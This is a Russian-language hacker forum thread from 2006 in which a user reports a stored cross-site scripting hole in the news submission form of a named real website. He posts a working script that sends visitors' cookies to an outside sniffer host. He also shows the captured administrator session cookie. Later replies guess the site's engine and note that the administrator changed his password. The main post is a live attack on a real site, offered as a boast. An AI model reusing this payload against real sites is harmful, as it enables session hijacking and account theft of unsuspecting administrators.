ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS на whitep.net
  #1  
Старый 07.03.2006, 17:18
Аватар для •••™NO FEAR™•••
•••™NO FEAR™•••
Постоянный
Регистрация: 08.08.2005
Сообщений: 782
Провел на форуме:
6573706

Репутация: 1419


Post XSS на whitep.net

Вот нашёл XSS на _http://whitep.net/
Сам скрипт который мы отсылаем в _http://whitep.net/modules.php (в добавлении новостей)
Код:
<script>img = new Image(); img.src = "http://s.netsec.ru/nofear/pic.gif?"+document.cookie;</script>
Новость сначало отсылается администратору, затем только тогда он добавляет её сам, ну и ему получается приходит наше сообщение, затем мы просто принимаем куки на снифе:

Код:
Date	07.03.2006 15:02	
IP 	***********	
Real Ip	***********	
Referer	http://whitep.net/modules.php	
Query	modtids=,; forum_read=a:1:{i:3;i:1141736162;}; topicsread=a:1:{i:46;i:1141736168;}; session_id=24123b67852c03e898fdea85869bf25e; hotlog=1	
Browser	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50
 
Ответить с цитированием

  #2  
Старый 07.03.2006, 17:21
Аватар для GreenBear
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

хм, наверно это на всех спайзах такое есть, где новости посылать можно...
помоему там код видно будет еще...
 
Ответить с цитированием

  #3  
Старый 07.03.2006, 17:25
Аватар для •••™NO FEAR™•••
•••™NO FEAR™•••
Постоянный
Регистрация: 08.08.2005
Сообщений: 782
Провел на форуме:
6573706

Репутация: 1419


По умолчанию

Цитата:
хм, наверно это на всех спайзах такое есть, где новости посылать можно...
помоему там код видно будет еще...
А чё это за движёк? Всмысле видно? Невидно его, я же только что пробывал.
P.S зайди в аську, дело есть!
 
Ответить с цитированием

  #4  
Старый 07.03.2006, 17:35
Аватар для GreenBear
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

Это ихмо спайз или пхпнюке

я грил видно =))
если бы не видно, не сменил бы он так быстро пасс
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Книга sql, xss и т.д. и т.п. tclover Болталка 9 28.03.2006 12:03
Xss на yandex.ru Pridu_ROCK Уязвимости 1 04.03.2006 01:08
Active XSS in Invision Power Board 2.1.4 k00p3r Уязвимости 8 03.03.2006 20:51
Как в такой XSS указать путь к античтовскому снифферу? Vovec Уязвимости 11 02.03.2006 01:08



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ